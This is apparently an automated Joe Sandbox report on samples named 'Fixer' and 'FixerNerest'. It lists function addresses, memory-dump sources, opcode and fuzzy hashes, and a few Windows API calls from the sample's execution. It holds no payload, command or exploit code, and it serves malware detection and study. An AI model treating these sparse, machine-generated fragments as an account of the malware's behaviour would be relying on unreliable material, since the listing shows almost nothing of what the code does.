                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: 66ceee7cb60cbc53307af4b8aff35d569798d5810d0a64e30b7a6356ade3ff26
                                                                                                                                                                                                                                            • Instruction ID: 7166df643dfaffb0b09b51d9bc7a2142023a53cbc753b02387946dec0dd0b92f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66ceee7cb60cbc53307af4b8aff35d569798d5810d0a64e30b7a6356ade3ff26
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6419FB0D0071DCBDB24DFAAC884A9DBBF5BF49304F20806AD508AB255DB75694ACF91
                                                                                                                                                                                                                                            Function 01945935 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 437 1945935-1945936 438 1945944-1945a01 CreateActCtxA 437->438 440 1945a03-1945a09 438->440 441 1945a0a-1945a64 438->441 440->441 448 1945a66-1945a69 441->448 449 1945a73-1945a77 441->449 448->449 450 1945a88 449->450 451 1945a79-1945a85 449->451 453 1945a89 450->453 451->450 453->453
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 019459F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: 929cffad5be8005b0e2eefb98ed1ad8fd542169556bfb3dc10a0fb5ff98bffb6
                                                                                                                                                                                                                                            • Instruction ID: 70af463b17fc26a8f00874b99ea03fc981d669c9f5452710d66339ae2fb93104
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 929cffad5be8005b0e2eefb98ed1ad8fd542169556bfb3dc10a0fb5ff98bffb6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E41D1B0C00719CBDB24DFAAC884B8DBBF5FF49304F20805AD818AB254DB756946CF91
                                                                                                                                                                                                                                            Function 0194D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 454 194d300-194d394 DuplicateHandle 455 194d396-194d39c 454->455 456 194d39d-194d3ba 454->456 455->456
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0194D387
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                            • Opcode ID: 892f26a9c7781815755030d5122e81322c81bfb59875ec7c8afeab7b91c9251c
                                                                                                                                                                                                                                            • Instruction ID: d3b3caa998f9b05c40f1f1bc415c0bc8356c7d20c13d78cf27b78afdd9fa4e16
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 892f26a9c7781815755030d5122e81322c81bfb59875ec7c8afeab7b91c9251c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B21B0B59003489FDB10DFAAD984ADEBFF9EB48314F14841AE918A3250D378A954CFA5
                                                                                                                                                                                                                                            Function 0194D2F9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 459 194d2f9-194d394 DuplicateHandle 460 194d396-194d39c 459->460 461 194d39d-194d3ba 459->461 460->461
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0194D387
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                            • Opcode ID: a6efed4a2af05756206cdcf79b56f827a14c1179620b12a9f47c062b6e871693
                                                                                                                                                                                                                                            • Instruction ID: dd47716d03a050d67b023910bac8c7bdcb632db8058cdece2f29c55551799e72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6efed4a2af05756206cdcf79b56f827a14c1179620b12a9f47c062b6e871693
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B421E4B5D003489FDB10CFAAD584ADEBFF5FB48314F14841AE918A3250C378A954CFA0
                                                                                                                                                                                                                                            Function 0194B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 464 194b020-194b060 465 194b062-194b065 464->465 466 194b068-194b093 GetModuleHandleW 464->466 465->466 467 194b095-194b09b 466->467 468 194b09c-194b0b0 466->468 467->468
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0194B086
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            • Opcode ID: 3ca2d1042159e387967b0963939d8457a3ae7f11f5dc4c494684e396f32d3774
                                                                                                                                                                                                                                            • Instruction ID: ec42355b2e0fb155ab440b4724f633daf2042779c88ae66b5b5c3d768d0334bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca2d1042159e387967b0963939d8457a3ae7f11f5dc4c494684e396f32d3774
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11DFB5C003498FDB20DF9AD444ADEFBF8AB89214F10841AD969A7210D379A545CFA1
                                                                                                                                                                                                                                            Function 016ED4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2201087202.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16ed000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3c6baaf9bb48c042187e5276be4bf80863283cafeec5c7f03d64d24ffee6897d
                                                                                                                                                                                                                                            • Instruction ID: 93aaf8aafa0354c1e7941dc48dc35393278f5006d7b1af49f48d4d78e96b0d57
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6baaf9bb48c042187e5276be4bf80863283cafeec5c7f03d64d24ffee6897d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D210371501240DFDB06DF58DDC8F26BFA5FB88318F20C669E9090B356C33AD416CAA2
                                                                                                                                                                                                                                            Function 016FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2201221498.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16fd000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bf328bb05fa29b548c27f4c418bce0060fc5e8121fcda37cfb966cea5ff4ebd1
                                                                                                                                                                                                                                            • Instruction ID: 61924d3be35d909951ff6dabf0e377ddb5306220a36d63bd06dd58d14ed40efd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf328bb05fa29b548c27f4c418bce0060fc5e8121fcda37cfb966cea5ff4ebd1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4321F271604204DFDB15DF68D984F26BF65FB88354F20C56DEA0A4B396C33AE447CA62
                                                                                                                                                                                                                                            Function 016FD006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2201221498.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16fd000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 969cfd739f1dacd2dd5f55382d77606a307225c8b33ce6c1078b35d2ecf53e46
                                                                                                                                                                                                                                            • Instruction ID: 3127601ae05317eae2d64baf92a43a3ef48770fac6bd2f5f60423c2517f998ea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 969cfd739f1dacd2dd5f55382d77606a307225c8b33ce6c1078b35d2ecf53e46
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF218B755093808FDB03CF24D994B15BF71EB46214F28C5EAD9498B6A7C33A980ACB62
                                                                                                                                                                                                                                            Function 016ED4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2201087202.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16ed000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                            • Instruction ID: bd94e793a7467af1f21b36f7db7abff15b27fedbd32197e36627ec0b2e76926a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D11E176404280CFCB02CF54D9C4B16BFB1FB88314F24C6A9D9490B257C336D45ACBA2

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 0194DC74 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fc087e7fa9fef55f8bd57425e0b9b17937dcf5064e0c23b1315a0133a9ecec6f
                                                                                                                                                                                                                                            • Instruction ID: 032f52f2ef1c76e83c046bea60ef0d7239e839855fc05b577fcc3a72db3e1bfb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc087e7fa9fef55f8bd57425e0b9b17937dcf5064e0c23b1315a0133a9ecec6f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDA19136E002068FCF05DFB8C54499EBBF6FF94301B15856AE909AB265DB71E905CB80

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF848F27AB4 Relevance: 1.3, Instructions: 1332COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e12ffcc443bd24f01eb8757817b89b6c50be6aa93e9ecf41aee63741a10de5f6
                                                                                                                                                                                                                                            • Instruction ID: 39d5289cced9c9637333ee1b375b32e3e04f1ddaae9815f64a908b6cbe908c8c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e12ffcc443bd24f01eb8757817b89b6c50be6aa93e9ecf41aee63741a10de5f6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45A2A430D1EA860FEB56B734A8751793FA19F12290F5914FAC489C71D3EF1E6C0A835A
                                                                                                                                                                                                                                            Function 00007FF848F2BB02 Relevance: .4, Instructions: 396COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2b9a2338019eafc94f9ad956999ead015b60399dbaa317955edcf74e922d88e1
                                                                                                                                                                                                                                            • Instruction ID: 0da2e1f1048bc832d7816ae5152b18baeb3eb2f4f8deedc13569af52bb630ab8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b9a2338019eafc94f9ad956999ead015b60399dbaa317955edcf74e922d88e1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DD18130918A4E8FEBA8EF28D8557E937E1FB58340F54826ED84DC7295CF3999408B85
                                                                                                                                                                                                                                            Function 00007FF848F2C8B2 Relevance: .4, Instructions: 379COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9dd12eedc8317e2e6f4110d47584b45ed7f1b04b7eabf6df61c66c4af8d54f74
                                                                                                                                                                                                                                            • Instruction ID: efaaf502740da25c1ab21665cbedaf04e2dad36edde4d9ef8922053356673e0e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dd12eedc8317e2e6f4110d47584b45ed7f1b04b7eabf6df61c66c4af8d54f74
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADD1B230A0CA4E8FEBA8EF28D8557E977D1FB58340F14826ED80DC7295DF7999408B85
                                                                                                                                                                                                                                            Function 00007FF848F27F30 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 23cda6b2cd9e442c1490b96dd828b553c3602251d04beb45be4f2ba4bc4160f1
                                                                                                                                                                                                                                            • Instruction ID: d918ce67159e7f2f90908040f4cefde1d09ec18cd4c7af3ab8bc28f7d4ebfbfe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23cda6b2cd9e442c1490b96dd828b553c3602251d04beb45be4f2ba4bc4160f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571D430C3C8660EF769B368F4826B56180EB153A0F8540BADCAE975C3AF1E7C9551DE
                                                                                                                                                                                                                                            Function 00007FF848F265D3 Relevance: 1.6, Strings: 1, Instructions: 359COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: #CN_^
                                                                                                                                                                                                                                            • API String ID: 0-2341464291
                                                                                                                                                                                                                                            • Opcode ID: 49e92ebf2d05257662ed54c3cf5ddeb77555c10e4db44a30c7618b88f057ac0a
                                                                                                                                                                                                                                            • Instruction ID: c263ca8c8693a90934600cdcf4566c30bc416aff2cc1b5fc2d93e714ec4b6c45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e92ebf2d05257662ed54c3cf5ddeb77555c10e4db44a30c7618b88f057ac0a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FC17C30A1D9158FEB88F728A4657A9B7E2FF98380F6405B9E009C32C2DF2DAC418755
                                                                                                                                                                                                                                            Function 00007FF848F281CD Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: _
                                                                                                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                                                                                                            • Opcode ID: d42720fd98c0fc10a74ae955e542b21be177ad9979ca66a9446dd3e2baabe716
                                                                                                                                                                                                                                            • Instruction ID: 03e3c694c380676df6993937ec861ce4456c6eda7aa39f1ff3ddcb34cc9c4c09
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d42720fd98c0fc10a74ae955e542b21be177ad9979ca66a9446dd3e2baabe716
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF110871E3CD590FF799B33864252B826C1EFA9791F8401BAC409C72C2DF1D6C820399
                                                                                                                                                                                                                                            Function 00007FF848F244FA Relevance: .3, Instructions: 297COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cd9f34405873ed2db351378acdaa4fd68f7340f5ab7db0ee02955105a3eca4fe
                                                                                                                                                                                                                                            • Instruction ID: ac73a400ab8eb2c26851d38cd51b9f13fd85f23d6dad84c7f75004af6ff52edb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd9f34405873ed2db351378acdaa4fd68f7340f5ab7db0ee02955105a3eca4fe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0881F322E1F15B2AE71037FC34261FE2F70DF412A9F480272E08C8E5C7DE1E684542AA
                                                                                                                                                                                                                                            Function 00007FF848F24540 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 545f7c1a829e3e549de865acf4fce75aae16e1c13b409d19464dc12e5343ee26
                                                                                                                                                                                                                                            • Instruction ID: add44bb52407eb447b319382475be61e64ed67892ade00de67cae80082d48c59
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 545f7c1a829e3e549de865acf4fce75aae16e1c13b409d19464dc12e5343ee26
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26711512E1F1572AE71037FC34261FE2F71DF802A9F884272F18C8A5C7DE1E684542A9

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 00007FF848F270FA Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2a1e9dc946702bf2f304bc74bdbb93c34d1eb815b92131e26403b6e5af209e62
                                                                                                                                                                                                                                            • Instruction ID: 50e6e9ed07e4d47cd01aad64c715f002dfbe1ec26e32492a5cce48953da0dbf3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1e9dc946702bf2f304bc74bdbb93c34d1eb815b92131e26403b6e5af209e62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C331B72771B669DBD341BBBCB8510EA7770EF42279B084377D188CE053CE1D504A87AA

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF848F382FB Relevance: 1.1, Instructions: 1079COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2c1017387854f0a3be28a2928313b7c9a6fea155375b33b2c538924bf7a18924
                                                                                                                                                                                                                                            • Instruction ID: 5a8b4d86c62ba5a438702f9c566c2cf3034d9960c8a278a0ad3e436a5083bb90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c1017387854f0a3be28a2928313b7c9a6fea155375b33b2c538924bf7a18924
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5682A130E2D6870FEB57B33498251763FA19F56291F8504B7C489C71D3EF1C690A93AA
                                                                                                                                                                                                                                            Function 00007FF848F3C7E6 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 98c8891d964f9a8f49903c0b1a17ed0611cf477f2f9acd90b6066f450649f7d9
                                                                                                                                                                                                                                            • Instruction ID: 4a62510a6dd5ff8a767c5202b8cae30f0fe21a035ec4c996ad3e17f3058f05f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98c8891d964f9a8f49903c0b1a17ed0611cf477f2f9acd90b6066f450649f7d9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F1A43090CA8D8FEBA8EF28C8557E937E1FF54350F04426EE84DC7295DB3899558B86
                                                                                                                                                                                                                                            Function 00007FF848F3D592 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: befd57e156e93d98b7ce4977977b7ebfce9e62083184155a75c8e4f68f9e6bf1
                                                                                                                                                                                                                                            • Instruction ID: b1618ccde936f5c628719a68346cc286e6ca292c808778d09ac7bf1e0fcac238
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: befd57e156e93d98b7ce4977977b7ebfce9e62083184155a75c8e4f68f9e6bf1
